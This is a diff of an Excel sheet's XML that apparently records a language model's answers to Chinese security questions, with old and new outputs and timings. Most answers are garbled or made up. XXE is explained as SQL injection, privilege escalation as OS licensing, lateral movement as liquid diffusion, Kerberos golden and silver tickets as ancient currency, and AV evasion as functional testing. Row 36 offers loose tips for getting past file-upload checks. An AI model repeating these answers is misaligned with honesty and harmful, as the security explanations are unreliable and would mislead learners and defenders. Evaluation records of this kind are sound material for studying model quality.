-为了避免逻辑漏洞的出现，开发人员可以采取一些措施，如对数据进行严格的验证和检查、使用多种逻辑检查工具、实现可靠的逻辑学习算法等。同时，在实际应用中，人工智能系统还需要根据用户反馈和实际评估来不断地进行改进和优化。&lt;/s&gt;</t>
+          <t>逻辑漏洞是指在逻辑语言中存在的一类漏洞，是指由于逻辑语言的缺陷或者定义不够，导致逻辑的结论不正确或者不完整。逻辑漏洞的存在可能会导致逻辑系统不能正确地分析或者处理某些问题。
+逻辑漏洞的常见类型包括：
+1. 逻辑假设：指的是逻辑语言中假设的一些不符合实际的情况。
+2. 逻辑谬误：指的是逻辑语言中存在的一些不符合逻辑原则的谬误。
+3. 逻辑偏见：指的是逻辑语言中存在的一些偏见或者假设，导致逻辑结论不正确。
+4. 逻辑缺乏：指的是逻辑语言中缺乏一些必要的定义或者规则，导致逻辑结论不完整。
+为了避免逻辑漏洞，逻辑学家和计算机科学家通常会使用一些逻辑技术和方法，如逻辑分析、逻辑可证明、逻辑模型验证等，以确保逻辑系统的正确性和完整性。</t>
         </is>
       </c>
       <c r="D34" t="n">
-        <v>12.90464925765991</v>
+        <v>11.24781322479248</v>
       </c>
     </row>
     <row r="35">
@@ -1371,23 +1377,22 @@
       </c>
       <c r="C35" t="inlineStr">
         <is>
-          <t>？
-逻辑漏洞是指在逻辑、计算机科学、数学等领域中存在的错误或缺陷。以下是一些常见的逻辑漏洞：
-1. 误解逻辑：在逻辑学中，人们常常误解逻辑语言，导致错误的解释和应用。
-2. 非 sequitur：指一个结论不是从前面的论据 logical consequence。
-3. 矛盾：一个人可能会做出矛盾的论断或判断，例如说一个人可能会认为，一个事物是正确的，但是又认为它的反面也是正确的。
-4. 偏见：偏见是一种不正确的思维方式，它是基于个人的偏好或习惯而非对话的结论。
-5. 逻辑犹豫：指一个人不能够做出明确的逻辑性的判断或论断，常常会出现在複雜的问题中。
-6. 欺诈：欺诈是一种不正确的思维方式，它是通过隐瞒或捏造信息来诱导人们的结论。
-7. 误解历史：误解历史是指不正确地理解历史事件或人物的思维方式。
-8. 误解数学：误解数学是指不正确地理解数学概念或结论的思维方式。
-9. 误解科学：误解科学是指不正确地理解科学理论或研究结果的思维方式。
-10. 逻辑疲劳：逻辑疲劳是指在解释或应用逻辑知识时感受到的疲劳或困难。
-这些逻辑漏洞都可以影响人们在逻辑、计算机科学、数学等领域中的思考和决策能力。了解和了解逻辑漏洞的常见形式可以帮助人们更好地理解和应用逻辑知识。&lt;/s&gt;</t>
+          <t>逻辑漏洞是指在逻辑思维中存在的错误或不完善之处，可能导致错误的结论或决策。以下是一些常见的逻辑漏洞：
+1. 谓词逻辑漏洞：这种漏洞 occurs when a statement is false, but its negation is also false. For example, "All cats are animals, but some animals are not cats."
+2. 非谓词逻辑漏洞：this type of logical fallacy occurs when a statement is true, but its negation is also true. For example, "Some cats are animals, so some animals are not cats."
+3. 逻辑环境漏洞：this type of fallacy occurs when the premises of a conclusion are not relevant to the conclusion. For example, "All cats are furry, so all dogs are furry."
+4. 偏见逻辑漏洞：this type of fallacy occurs when a conclusion is based on a personal opinion or bias rather than objective evidence. For example, "I believe that the Earth is flat, therefore it is flat."
+5. 假设逻辑漏洞：this type of fallacy occurs when a conclusion is based on an unproven assumption. For example, "If cats could talk, they would tell us the secrets of the universe."
+6. 误断逻辑漏洞：this type of fallacy occurs when a conclusion is based on an incorrect interpretation of the facts. For example, "The economy is in recession because of the government's policies, therefore the government is responsible for the recession."
+7. 投影逻辑漏洞：this type of fallacy occurs when a conclusion is based on an incorrect assumption about the relationship between two things. For example, "If I have a headache, then I must be sick."
+8. 假设逻辑漏洞：this type of fallacy occurs when a conclusion is based on an unproven assumption. For example, "If cats could talk, they would tell us the secrets of the universe."
+9. 逻辑漏洞：this type of fallacy occurs when a conclusion is based on a false premise. For example, "All cats are mammals, so all dogs are mammals."
+10. 简单逻辑漏洞：this type of fallacy occurs when a conclusion is based on a simple or obvious mistake. For example, "The sky is blue because the Earth is round."
+These are just a few examples of common logical fallacies. It's important to be aware of these fallacies in order to make sound arguments and avoid drawing false conclusions.</t>
         </is>
       </c>
       <c r="D35" t="n">
-        <v>18.35255408287048</v>
+        <v>15.87480998039246</v>
       </c>
     </row>
     <row r="36">
@@ -1401,19 +1406,32 @@
       </c>
       <c r="C36" t="inlineStr">
         <is>
-          <t>？
-文件上传检查功能是一个常见的安全measure，用于防止恶意文件或恶意程序在文件上传。但是有时候，你可能需要绕过这个功能，例如，你想要上传一个具有某些特定结构的文件，但是这个文件无法通过文件上传检查功能。
-以下是一些可能的绕过方法：
-1. 使用 Base64 编码：将文件 Base64 编码后，将其作为字符串上传。这样，文件上传检查功能不会检查文件的内容，而是只会检查文件的长度和MD5 hash。
-2. 使用分割上传：将大文件分割成多个小文件，然后将每个小文件上传。这样，文件上传检查功能只需要检查每个小文件的内容，而不是整个大文件。
-3. 使用隐藏文件：将文件嵌入到一个隐藏文件中，然后上传这个隐藏文件。文件上传检查功能可能不会检查隐藏文件的内容，因此可以绕过这个功能。
-4. 使用掩码：使用一个掩码文件来掩住文件的内容。然后，将掩码文件上传，文件上传检查功能可能不会检查掩码文件的内容，因此可以绕过这个功能。
-5. 使用数据 URI：将文件 converted to a data URI，然后上传这个 data URI。文件上传检查功能可能不会检查数据 URI 的内容，因此可以绕过这个功能。
-需要注意的是，绕过文件上传检查功能可能会导致安全问题，因此你应该仅在确实需要时使用这些绕过方法。&lt;/s&gt;</t>
+          <t>文件上传检查是一种常用的安全措施，它可以帮助防止恶意文件的上传。但是，有时候你可能想要绕过这个检查，例如，在开发测试环境中，你可能想要上传一个大文件，但是它可能会被检查为恶意文件。这时候，你可以使用以下方法绕过文件上传检查：
+1. 使用文件名的替换：
+你可以使用文件名的替换来绕过文件上传检查。例如，如果你想要上传一个大文件，但它被检查为恶意文件，你可以将其重命名为一个不受检查的文件名，例如，将 large.exe 重命名为 large.txt。这样，它就不会被视为恶意文件了。
+2. 使用文件内容的替换：
+你也可以使用文件内容的替换来绕过文件上传检查。例如，你可以将文件的内容 rewrite 为一个不受检查的内容，例如，将一个恶意文件的内容 rewrite 为一个harmless 的内容。
+3. 使用一个允许所有文件的文件类型：
+如果你的文件上传系统允许所有文件类型，那么你可以上传任何文件，无论它是否被检查为恶意文件。这可能会降低你的安全性，但是它也可以帮助你绕过文件上传检查。
+4. 使用一个允许所有文件的文件上传器：
+你也可以使用一个允许所有文件的文件上传器来绕过文件上传检查。例如，你可以使用一个允许所有文件类型的文件上传器，例如，FTP 客户端，而不是一个允许恶意文件的文件上传器。
+5. 使用一个批处理的方式：
+你也可以使用一个批处理的方式来绕过文件上传检查。例如，你可以使用一个批处理脚本来上传多个文件，而不是一个个的上传。这样，它们就不会被视为恶意文件了。
+6. 使用一个虚拟文件系统的方式：
+你也可以使用一个虚拟文件系统的方式来绕过文件上传检查。例如，你可以使用一个虚拟文件系统，例如，VirtualBox，来上传文件，而不是直接上传到文件系统中。这样，它们就不会被视为恶意文件了。
+7. 使用一个代理服务器的方式：
+你也可以使用一个代理服务器的方式来绕过文件上传检查。例如，你可以使用一个代理服务器，例如，一个VPN服务器，来上传文件，而不是直接上传到文件系统中。这样，它们就不会被视为恶意文件了。
+8. 使用一个加密的方式：
+你也可以使用一个加密的方式来绕过文件上传检查。例如，你可以使用一种加密的文件上传方式，例如，HTTPS 上传，而不是使用一个普通的文件上传方式。这样，它们就不会被视为恶意文件了。
+9. 使用一个分割的方式：
+你也可以使用一个分割的方式来绕过文件上传检查。例如，你可以将一个大文件分割成多个小文件，然后上传它们。这样，它们就不会被视为恶意文件了。
+10. 使用一个模板的方式：
+你也可以使用一个模板的方式来绕过文件上传检查。例如，你可以使用一个模板，例如，一个HTML 模板，来上传文件，而不是直接上传到文件系统中。这样，它们就不会被视为恶意文件了。
+这些方法可以帮助你绕过文件上传检查，但是，你需要注意，这些方法可能会降低你的安全性，因此，你应该仅在需要时使用它们。</t>
         </is>
       </c>
       <c r="D36" t="n">
-        <v>14.44737529754639</v>
+        <v>31.56301474571228</v>
       </c>
     </row>
     <row r="37">
@@ -1427,15 +1445,17 @@
       </c>
       <c r="C37" t="inlineStr">
         <is>
-          <t>？
- horizontal and vertical rights are two different concepts in the context of intellectual property law. Here are the key differences:
-Horizontal rights refer to the exclusive rights granted to an inventor or creator over their invention or work, in relation to the same field or industry. In other words, horizontal rights are concerned with the protection of a particular invention or work within a specific industry or market. For example, a patent holder for a new type of smartphone technology may have horizontal rights over their invention, preventing others from making or selling similar smartphones in the same market.
-Vertical rights, on the other hand, refer to the exclusive rights granted to an inventor or creator over their invention or work, in relation to different fields or industries. In other words, vertical rights are concerned with the protection of a particular invention or work across different markets or industries. For example, a patent holder for a new type of medical device may have vertical rights over their invention, preventing others from making or selling similar devices in different medical fields.
-In summary, horizontal rights focus on protecting a single invention or work within a specific industry or market, while vertical rights focus on protecting the same invention or work across different industries or markets. Both types of rights are important in the context of intellectual property law, as they help to ensure that inventors and creators are fairly compensated for their innovations and creations.&lt;/s&gt;</t>
+          <t>在中国，水平越权和垂直越权都是指企业的权利，但是它们之间有一定的区别。
+水平越权是指企业可以在同一个市或 province 内通过购买、合并或与其他企业 merge 等方式扩大其资产、营业部门、营业额、人员和其他资源，而不受到政府的限制和约束。
+垂直越权是指企业可以在不同的市或 province 内扩大其资产、营业部门、营业额、人员和其他资源，而不受到政府的限制和约束。
+根据中国的法律法规，水平越权和垂直越权都是规定的权利，但是它们之间有一定的区别。水平越权仅仅是在同一个市或 province 内扩大资产、营业部门、营业额、人员和其他资源，而垂直越权则可以在不同的市或 province 内扩大资产、营业部门、营业额、人员和其他资源。
+因此，水平越权和垂直越权之间的区别在于，水平越权仅仅是内地扩大，而垂直越权则可以是内地和外地扩大。
+此外， Wasser 和 Straight 的越权也有一些历史和文化的差异。 Wasser 的越权起源于古代欧洲的法律 system，是在同一个国家或地区内扩大资产、营业部门、营业额、人员和其他资源的权利。而 Straight 的越权起源于美国的法律 system，是在不同的州或地区内扩大资产、营业部门、营业额、人员和其他资源的权利。
+总之，水平越权和垂直越权是中国的法律法规中规定的权利，它们之间有一定的区别， Wasser 和 Straight 的越权也有一些历史和文化的差异。</t>
         </is>
       </c>
       <c r="D37" t="n">
-        <v>7.491214275360107</v>
+        <v>17.59163022041321</v>
       </c>
     </row>
     <row r="38">
@@ -1449,15 +1469,28 @@
       </c>
       <c r="C38" t="inlineStr">
         <is>
-          <t>？XXE是什么？
-XXE是一种漏洞，它通过解析XML字符串中嵌入的脚本来执行外部命令。这种漏洞可能会让攻击者通过访问受影响的系统的 XML 数据来执行外部命令。
-XXE 漏洞的名称来源于"XML External Entity"，即 XML 外部实体。它是指 XML 文档中嵌入的脚本，可以是 JavaScript、Python 等语言的代码。这些脚本可以在受影响的系统中执行，从而执行敏感操作。
-XXE 漏洞可以通过多种方式进行攻击，其中一种常见的方式是在 XML 文档中嵌入 malicious 脚本，并通过访问受影响的系统的 XML 数据来执行这些脚本。这种攻击方式可以允许攻击者访问和修改数据，以及执行敏感操作。
-为了防止 XXE 漏洞，建议优化系统的 XML 处理规范，限制外部脚本的执行，并在受影响的系统中启用安全扩展名（SAX）Parser，它可以更好地esian 处理 XML 数据，避免执行脚本。此外，还可以通过在系统中启用 Content Security Policy（CSP）来限制脚本的执行，从而防止攻击者在受影响的系统中执行 malicious 脚本。&lt;/s&gt;</t>
+          <t>XXE漏洞是指什么？
+XXE（External Entity）漏洞是一种常见的安全漏洞，它 occurs when an application fails to properly sanitize or validate user-supplied data, allowing an attacker to inject and execute external entities, such as XML or HTML, within the application.
+XXE漏洞可以通过以下方式进行攻击：
+1. XML Injection: An attacker can inject malicious XML code into a query or command, allowing them to execute arbitrary SQL code, obtain sensitive information, or modify data.
+2. HTML Injection: An attacker can inject malicious HTML code into a web application, allowing them to execute JavaScript code, steal sensitive information, or perform other malicious actions.
+3. CSS Injection: An attacker can inject malicious CSS code into a web application, allowing them to style the application in an unexpected way or perform other malicious actions.
+4. JavaScript Injection: An attacker can inject malicious JavaScript code into a web application, allowing them to execute arbitrary code, steal sensitive information, or perform other malicious actions.
+XXE漏洞可以在多种应用程序中发现，包括：
+1. Web applications: Web applications that use unvalidated user input in SQL queries or other operations are vulnerable to XXE attacks.
+2. Databases: Databases that use unvalidated user input in SQL queries or other operations are vulnerable to XXE attacks.
+3. API endpoints: API endpoints that use unvalidated user input in HTTP requests or other operations are vulnerable to XXE attacks.
+4. Cloud applications: Cloud applications that use unvalidated user input in SQL queries or other operations are vulnerable to XXE attacks.
+XXE漏洞可以通过以下方式防止：
+1. Validating user input: Ensure that all user-supplied input is validated and sanitized before being used in SQL queries or other operations.
+2. Using parameterized queries: Use parameterized queries instead of concatenating user input directly into SQL queries.
+3. Escaping special characters: Escape special characters in user-supplied input to prevent them from being interpreted as part of SQL queries.
+4. Limiting privileges: Limit the privileges of users and applications to prevent them from accessing sensitive information or modifying data.
+In summary, XXE漏洞 is a common security vulnerability that can occur in web applications, databases, API endpoints, and cloud applications. It can be exploited by attackers to inject malicious code, steal sensitive information, or perform other malicious actions. To prevent XXE attacks, it is important to validate user input, use parameterized queries, escape special characters, and limit privileges.</t>
         </is>
       </c>
       <c r="D38" t="n">
-        <v>12.86815071105957</v>
+        <v>15.01674818992615</v>
       </c>
     </row>
     <row r="39">
@@ -1471,23 +1504,22 @@
       </c>
       <c r="C39" t="inlineStr">
         <is>
-          <t>？
-有哪些操作系统提权方式？下面是一些常见的操作系统提权方式：
-1. 系统提权：这是最常见的操作系统提权方式，它让用户在系统中具有特定的权限和访问权限，以便在系统中进行管理和控制。
-2. 用户帐户 Control：这种方式让用户创建和管理自己的帐户，并将帐户分配给其他用户或组织，以便进行访问控制和安全管理。
-3. 角色分配：这种方式让用户被分配到角色，角色是一种用于描述用户的权限和责任的单元，用户可以根据角色的权限和责任来进行操作。
-4. 访问控制 List：这种方式让系统管理员可以将用户分配到不同的访问控制列表，以便控制用户在系统中的访问权限。
-5. 安全审批：这种方式让系统管理员可以对用户进行安全审批，以确保用户的操作符合系统的安全政策。
-6. 访问控制 Policy：这种方式让系统管理员可以定义和应用访问控制策略，以便控制用户在系统中的访问权限。
-7. 身份验证：这种方式让用户进行身份验证，以确保用户的身份是安全的和可靠的。
-8. 授权：这种方式让系统管理员可以将授权授予给用户或组织，以便控制用户在系统中的操作。
-9. 权限管理：这种方式让系统管理员可以管理用户的权限，以确保用户只能在系统中进行访问和操作他们应有的权限。
-10. 安全评估：这种方式让系统管理员可以对用户进行安全评估，以确保用户的操作符合系统的安全政策。
-这些操作系统提权方式都可以帮助系统管理员更好地控制和管理系统的访问和操作，从而提高系统的安全性和可靠性。&lt;/s&gt;</t>
+          <t>操作系统（OS）是一种软件，负责管理计算机系统的资源，以便运行其他软件。它提供了一个用户界面，扩展功能和安全功能，以便操作系统的用户可以轻松地使用计算机。下面是一些常见的操作系统的授权方式：
+1. 软件价格：一些操作系统，如Windows、MacOS和Linux，提供了软件价格，用于购买和使用。
+2. 免费：一些操作系统，如Open source和自由软件，提供免费下载和使用，但可能需要付出一些财政费用或者参与开发活动。
+3.  beta测试：一些操作系统，如beta测试版，可以免费下载和使用，但需要注意是非正式的版本，可能存在问题和不稳定。
+4. 学生/教育版：一些操作系统，如Windows和MacOS，提供了学生/教育版，优惠学生和教育机构。
+5. 企业版：一些操作系统，如Windows和Linux，提供了企业版，优惠大规模企业和组织。
+6. 家庭版：一些操作系统，如Windows和MacOS，提供了家庭版，优惠个人和家庭用户。
+7. 插件/扩展：一些操作系统，如Firefox和Chrome，提供了插件和扩展，可以增强功能和可用性。
+8. 云服务：一些操作系统，如Amazon Web Services和Microsoft Azure，提供了云服务，可以在云端运行软件和数据。
+9. 虚拟机：一些操作系统，如VirtualBox和VMware，提供了虚拟机功能，可以在虚拟环境中运行多个操作系统。
+10. 嵌入式系统：一些操作系统，如DOS和Linux，提供了嵌入式系统，可以在嵌入式设备上运行。
+需要注意的是，这些授权方式可能会变化，请关注官方网站的最新信息。</t>
         </is>
       </c>
       <c r="D39" t="n">
-        <v>18.83731293678284</v>
+        <v>17.55658102035522</v>
       </c>
     </row>
     <row r="40">
@@ -1501,22 +1533,24 @@
       </c>
       <c r="C40" t="inlineStr">
         <is>
-          <t>？
-混淆是指将代码分成多个块，每个块都可以被编译成不同的类型的代码，例如扩展程序、库或者核心。这种方法可以帮助开发人员更好地组织代码，减少代码的依赖性和复杂性，同时也可以帮助开发人员更好地管理代码的质量。
-在做代码混淆之前，需要做好以下准备：
-1. 理解混淆工具：需要了解一些常用的混淆工具，例如：Eclipse的AspectJ、NetBeans的AspectJ、IntelliJ IDEA的AspectJ等。这些工具可以帮助开发人员更好地编译和管理混淆代码。
-2. 准备代码：需要将代码分成多个块，每个块都可以被编译成不同的类型的代码。这些块可以根据需要进行组织和命名，以便于后续的混淆编译和管理。
-3. 配置混淆工具：需要根据不同的混淆工具进行配置，以便于其能够正确地处理和混淆代码。这可能包括 configuring build paths、setting classpath、setting sourcepath等。
-4. 编译和混淆代码：需要使用混淆工具来编译和混淆代码，这可能包括以下步骤：
-a. 编译代码：需要使用混淆工具来编译代码，以便于其能够正确地处理和混淆代码。
-b. 混淆代码：需要使用混淆工具来混淆代码，以便于其能够正确地生成混淆代码。
-c. 分析混淆代码：需要使用混淆工具来分析混淆代码，以便于其能够正确地生成混淆代码。
-5. 管理混淆代码：需要根据不同的混淆工具进行管理，以便于其能够正确地处理和管理混淆代码。这可能包括管理混淆代码的包含和依赖关系、管理混淆代码的编译和混淆等。
-总之，做代码混淆需要了解混淆工具和其配置、编译和混淆代码、管理混淆代码等。通过使用混淆工具，开发人员可以更好地组织代码，减少代码的依赖性和复杂性，同时也可以帮助开发人员更好地管理代码的质量。&lt;/s&gt;</t>
+          <t>，做到代码质量提高？
+代码混淆是指将代码分割成多个小块，并将每个小块都混合到不同的文件中，以便在重构或升级时更加容易维护和增加代码质量。
+以下是一些代码混淆的方法：
+1. 分割代码：将代码分割成多个小块，每个小块都可以被理解和维护，并将每个小块写入不同的文件中。
+2. 使用模块：使用模块将代码分割成不同的模块，每个模块都可以独立运行，并且可以在不同的文件中编辑和维护。
+3. 使用静态资源分割：将代码分割成静态资源，例如图像、资源文件等，并将每个静态资源写入不同的文件中。
+4. 使用IDE的代码混淆功能：一些 IDE 如 Eclipse、Visual Studio 等提供了代码混淆功能，可以帮助开发者自动将代码分割成多个小块，并将每个小块写入不同的文件中。
+5. 使用 Third-party 工具：一些第三方工具如 Resharper、CodeRush 等提供了代码混淆功能，可以帮助开发者自动将代码分割成多个小块，并将每个小块写入不同的文件中。
+使用代码混淆可以提高代码质量，改进代码的维护和扩展性，但是需要注意以下几点：
+1. 保持代码可读性：使用代码混淆时，需要保持代码的可读性，以便其他开发者可以快速理解和维护代码。
+2. 保持代码可维护性：使用代码混淆时，需要保持代码的可维护性，以便在更改或升级时可以快速定位和更新问题。
+3. 协作和合作：使用代码混淆时，需要协作和合作，以便各个开发者可以在不同的文件中进行编辑和维护。
+4. 维护代码框架：使用代码混淆时，需要维护代码框架，以便在不同的文件中使用相同的编程风格和规范。
+总之，使用代码混淆可以提高代码质量，改进代码的维护和扩展性，但是需要注意以上几点，并且需要维护代码框架和协作的合作。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D40" t="n">
-        <v>23.43793249130249</v>
+        <v>22.53127980232239</v>
       </c>
     </row>
     <row r="41">
@@ -1530,23 +1564,28 @@
       </c>
       <c r="C41" t="inlineStr">
         <is>
-          <t>，能够让测试人员不感觉到压力和疲劳，保持见解和质量？  
-在测试过程中，许多测试人员会感到压力和疲劳，这种情况通常叫做“测试剧症”。为了避免这种情况，我们可以采取以下措施：
-1. 明确测试目标：明确测试的目标和要求，以帮助测试人员更好地了解测试的意义和目的。
-2. 采用适度的测试步骤：逐步增加测试步骤的难度和规模，以帮助测试人员逐渐演练和提高自己的技能。
-3. 增加测试范围：逐渐扩大测试范围，以增加测试人员的经验和技能。
-4. 采用不同的测试方法：采用不同的测试方法，如manual testing、automated testing、hybrid testing等，以增加测试的多样性和复杂性。
-5. 提供testing资源：提供testing资源，如testing框架、testing工具、testing文档等，以帮助测试人员更好地完成测试任务。
-6. 增加测试评估和答案评估：增加测试评估和答案评估，以帮助测试人员更好地评估测试结果和测试步骤。
-7. 增加测试时间：增加测试时间，以帮助测试人员更好地了解测试的进度和结果。
-8. 增加测试人员的合作和沟通：增加测试人员的合作和沟通，以帮助测试人员更好地完成测试任务和协作。
-9. 提供测试人员的支持和评价：提供测试人员的支持和评价，以帮助他们更好地完成测试任务和协作。
-10. 增加测试的娱乐性：增加测试的娱乐性，以帮助测试人员更好地完成测试任务和产生质量。
-通过采取以上措施，可以帮助测试人员快速适应测试任务，提高测试效率和质量，并减少测试剧症的影响。&lt;/s&gt;</t>
+          <t>测试
+免杀测试（Functional Testing）是一种测试方法，它的目的是确保软件在生产环境中运行正常，并能够具备正常的性能和可靠性。下面是一些建议如何做免杀测试：
+1. 识别和预测：在开发过程中，identify the critical features and functionalities of the software, and predict the potential issues that may arise during testing.
+2. Test Case Development：develop test cases that cover all the identified critical features and functionalities, and ensure that the test cases are well-structured and easy to understand.
+3. Test Environment Setup：set up a test environment that mimics the production environment as closely as possible, and ensure that the test environment is stable and reliable.
+4. Test Data Management：manage test data effectively, and ensure that the test data is accurate and relevant to the test cases.
+5. Test Execution and Monitoring：execute the test cases and monitor the test execution closely, and take appropriate actions if any issues are found.
+6. Defect Reporting and Tracking：report and track defects found during testing, and ensure that the defects are properly documented and tracked until they are resolved.
+7. Regression Testing：perform regression testing to ensure that changes made during testing do not introduce new issues or affect the existing functionality.
+8. Performance Testing：perform performance testing to ensure that the software can handle the expected load and perform well under different conditions.
+9. Stress Testing：perform stress testing to identify the breaking points of the software and ensure that it can handle unexpected loads.
+10. Security Testing：perform security testing to identify vulnerabilities and ensure that the software is secure and protected against potential attacks.
+11. Usability Testing：perform usability testing to ensure that the software is easy to use and provides a good user experience.
+12. Compliance Testing：perform compliance testing to ensure that the software complies with relevant industry standards and regulations.
+13. Automation Testing：automate the testing process where possible, and use automated testing tools to improve efficiency and reduce the risk of human error.
+14. Continuous Testing：perform testing continuously throughout the development cycle, and ensure that testing is integrated into the development process.
+15. Test Reporting and Analysis：provide detailed test reports and analysis, and use the results of the testing to improve the software and the testing process.
+By following these steps, you can ensure that your software is thoroughly tested and ready for release, and that the testing process is efficient, effective, and provides valuable insights into the software's quality and performance.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D41" t="n">
-        <v>20.3531129360199</v>
+        <v>15.02122092247009</v>
       </c>
     </row>
     <row r="42">
@@ -1561,19 +1600,14 @@
       <c r="C42" t="inlineStr">
         <is>
           <t>和银票据？
-What are golden ticket, silver ticket, and silver-plated ticket?
-Golden ticket, silver ticket, and silver-plated ticket are different types of tickets used in various industries. Here's a brief overview of each:
-1. Golden Ticket:
-A golden ticket is a special type of ticket that offers the holder access to exclusive benefits or privileges. In the entertainment industry, golden tickets are often used to reward loyal customers or fans with premium experiences, such as backstage tours or meet-and-greets with celebrities. In the travel industry, golden tickets may provide access to luxury accommodations or exclusive travel packages.
-2. Silver Ticket:
-A silver ticket is a type of ticket that offers a lower level of access or benefits compared to a golden ticket. In the entertainment industry, silver tickets may provide access to general admission or standard seating at a concert or event. In the travel industry, silver tickets may offer discounted rates on flights or accommodations.
-3. Silver-Plated Ticket:
-A silver-plated ticket is a type of ticket that is not as valuable or exclusive as a golden ticket, but still offers some benefits or privileges. In the entertainment industry, silver-plated tickets may provide access to VIP areas or events, but not the same level of access as a golden ticket. In the travel industry, silver-plated tickets may offer discounts or perks, but not as extensive as those offered by a silver ticket.
-In summary, the main difference between golden ticket, silver ticket, and silver-plated ticket is the level of exclusivity and access they offer. Golden tickets offer the most exclusive and premium experiences, followed by silver tickets, and then silver-plated tickets, which offer less exclusive benefits.&lt;/s&gt;</t>
+黄金票据、白银票据和银票据是指在古代中国的货币系统中，黄金、白银和银的质量和价值的标准。这些标准通常是由政府或财政机构颁布的，用于确定货币的质量和价值，以确保货币的预定价值不会因物理减量或泛滥而受到影响。
+黄金票据是指黄金的质量和价值的标准，通常由一定重量的黄金提供价格 reference。白银票据是指白银的质量和价值的标准，通常由一定重量的白银提供价格 reference。银票据是指银的质量和价值的标准，通常由一定重量的银提供价格 reference。
+在古代中国，黄金、白银和银是三大货币，它们的价值相对稳定，可以用于购买、卖出和资产交易。这些货币标准的颁布，使得货币的价值和质量得到了保障，从而增加了贸易和经济活动的可靠性和可持续性。
+综上所述，黄金票据、白银票据和银票据是指古代中国货币系统中，黄金、白银和银的质量和价值的标准，它们的颁布使得货币的价值和质量得到了保障，从而增加了贸易和经济活动的可靠性和可持续性。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D42" t="n">
-        <v>9.840631008148193</v>
+        <v>14.60935854911804</v>
       </c>
     </row>
     <row r="43">
@@ -1587,21 +1621,22 @@
       </c>
       <c r="C43" t="inlineStr">
         <is>
-          <t>？
-横向渗透是指在柔软材料上通过渗透剂或液体的渗透过程，以实现某种效果或特点。下面是一些常见的横向渗透手段：
-1. 涂覆液剂：通过涂覆柔软材料的表面用液剂，实现横向渗透。这种方法可以控制渗透的速度和深度，同时也可以实现某些特殊效果。
-2. 渗透剂：通过添加渗透剂到液体中，可以提高液体的渗透性，从而实现横向渗透。渗透剂可以是 organic molecules、inorganic molecules 或nano particles。
-3. 热渗透：通过加热液体，使其具有更强的渗透性，从而实现横向渗透。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
-4. 气压渗透：通过加压液体，使其渗透到柔软材料表面。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
-5.  ultrasonic cleaning：通过 ultrasonic 洗涤，可以实现横向渗透。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
-6. 磁気渗透：通过磁场的影响，实现横向渗透。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
-7. 紫外渗透：通过紫外线的影响，实现横向渗透。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
-8. 激光渗透：通过激光的影响，实现横向渗透。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
-这些横向渗透手段可以根据具体情况和应用场景进行选择和组合，以实现不同的效果和特点。&lt;/s&gt;</t>
+          <t>横向渗透是指在材料表面通过涂覆层或者液体的渗透，从而传导材料内部的各种 Properties 的一种方法。下面是一些常用的横向渗透手段：
+1. Gravimetric method: This method measures the weight change of a sample after immersing it in a solvent or a gas. The weight change is directly proportional to the amount of substance that has diffused across the surface.
+2. Diffusion cell: A diffusion cell is a device used to measure the diffusion coefficient of a substance. The cell consists of two compartments separated by a membrane, and the diffusion process is observed by measuring the concentration gradient across the membrane.
+3. Capillary rise method: This method involves measuring the height of a liquid column that rises inside a capillary tube. The height of the column is directly proportional to the diffusion coefficient of the substance.
+4. Dialysis method: This method involves using a dialysis tube to separate the substance of interest from a solvent or another substance. The rate of diffusion is measured by observing the concentration gradient across the tube.
+5. Permeability test: This method involves measuring the rate of diffusion of a substance through a porous material. The permeability of the material is directly proportional to the diffusion coefficient of the substance.
+6. Gas diffusion method: This method involves measuring the rate of diffusion of a gas through a membrane or a porous material. The rate of diffusion is directly proportional to the diffusion coefficient of the gas.
+7. Electrochemical method: This method involves measuring the current that flows through a electrode in response to a potential difference applied across it. The diffusion coefficient can be calculated from the current-voltage characteristics of the electrode.
+8. Nuclear magnetic resonance (NMR) method: This method involves using NMR spectroscopy to measure the diffusion coefficient of a substance. The NMR signal from the substance is used to calculate the diffusion coefficient.
+9. Fluorescence method: This method involves using fluorescence spectroscopy to measure the diffusion coefficient of a substance. The fluorescence signal from the substance is used to calculate the diffusion coefficient.
+10. Laser-induced breakdown spectroscopy (LIBS) method: This method involves using LIBS to measure the diffusion coefficient of a substance. The LIBS signal from the substance is used to calculate the diffusion coefficient.
+These are just a few examples of the many methods that can be used to measure the diffusion coefficient of a substance. The choice of method will depend on the specific requirements of the experiment and the properties of the substance being studied.</t>
         </is>
       </c>
       <c r="D43" t="n">
-        <v>21.62320876121521</v>
+        <v>15.33744502067566</v>
       </c>
     </row>
     <row r="44">
@@ -1615,24 +1650,25 @@
       </c>
       <c r="C44" t="inlineStr">
         <is>
-          <t>？  
-Internal network intrusion can leave behind what kind of traces?
-Well, the traces of internal network intrusion can vary depending on the severity and nature of the intrusion. Here are some common types of traces that an intruder may leave behind:
-1. Log files: An intruder may create log entries in the system logs, which can provide valuable information about the intruder's activities, including the dates and times of access, the IP addresses of the compromised machines, and the commands executed.
-2. System configuration changes: An intruder may modify system configuration settings, such as the firewall rules, network settings, or user accounts, to gain unauthorized access to the network. These changes may be detected by comparing the current system configuration with a known good configuration.
-3. Data tampering: An intruder may modify or delete sensitive data, such as financial information, personal identifiable information, or intellectual property. Forensic analysis of the affected systems can help identify the types of data that have been altered or deleted.
-4. Network traffic analysis: Analyzing network traffic patterns can reveal the presence of an intruder, including the types of traffic generated by the intruder, such as login attempts, file transfers, or command and control (C2) traffic.
-5. User behavior analysis: Monitoring user behavior can help identify potential intruders, such as abnormal login activity, unusual file access, or sudden changes in user behavior.
-6. Malware presence: An intruder may leave behind malware, such as viruses, trojans, or rootkits, which can be detected through various methods, including antivirus software, memory scanning, or system scanning.
-7. Network reconnaissance: An intruder may perform network reconnaissance activities, such as scanning for open ports, services, or vulnerabilities, which can provide valuable information about the target network.
-8. Data exfiltration: An intruder may extract sensitive data from the network, which can be detected through various methods, including network monitoring, log analysis, or data loss prevention (DLP) tools.
-9. Network segmentation: An intruder may attempt to exploit vulnerabilities in isolated segments of the network, which can provide insight into the intruder's tactics, techniques, and procedures (TTPs).
